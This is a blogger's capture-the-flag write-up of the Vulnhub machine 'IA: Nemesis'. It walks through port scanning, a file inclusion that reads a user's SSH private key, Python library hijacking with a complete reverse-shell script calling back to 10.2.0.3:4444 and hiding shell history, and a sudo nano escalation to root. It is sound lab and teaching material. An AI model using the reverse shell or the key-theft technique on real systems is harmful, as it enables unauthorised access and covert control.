IA: Nemesis Vulnhub Writeup

Difficulty: Medium/Hard

NMAP:

Nice some ports re opens, and ssh is on port: 52846 , let’s browse

But nothing interesting here, we noticee that port 52845 is http, let’s browse

Now let’s enumerate the browser and we can found something interesting.

Let’s move on “Contact us” , we can write so, we can do a command injection?

LFI:

Nice and we have username!

thanos and carlos are the users, so we can try to find RSA key in the follow directory /home/thanos/.ssh/id_rsa and and try to enter in ssh!!

And we have the KEY!!!!!! Save it in file id_rsa and give the permission: chmod 600 id_rsa and let’s login in ssh!!

GOT FIRST FLAG!! Now let’s enumerate!

User Enumeration:

We find the file “backup.py” at this moment i stuck! but thank you google! i found how to bypass this step!

Privilege Escalation:

https://rastating.github.io/privilege-escalation-via-python-library-hijacking/

import os
import pty
import socket

lhost = “10.2.0.3”
lport = 4444

ZIP_DEFLATED = 0

class ZipFile:
def close(*args):
return

def write(*args):
return

def __init__(self, *args):
return

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((lhost, lport))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
os.putenv(“HISTFILE”,’/dev/null’)
pty.spawn(“/bin/bash”)
s.close()

After creating our script, give execute permission chmod +x zipfile.py and listen on the netcat!

We notice that file “backup.py” execute always every one minutes! So just listen on the port!

Nice we take the second flag!!!! Now let’s go to root this box!

We have an hint in the file root.txt! So let’s see this file!

As we can see , this hash encrypted is encrypted with affine encryption!!! So we need to fine on google “affine chiper decrypt”!

And we finally found the password! But didn’t work for root, so we can use that for carlos, for finding sudo vulnerabilities!

Vertical Privilege Escalation:

Go on GTFO bins and find “nano”

Command: sudo /bin/nano /opt/priv

BUT! For doing this just become on the shell of thanos and press su carlos and insert password

ROOT!

I Hope this is usefull! Follow me on Twitter too @ 0xJin

Jin

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store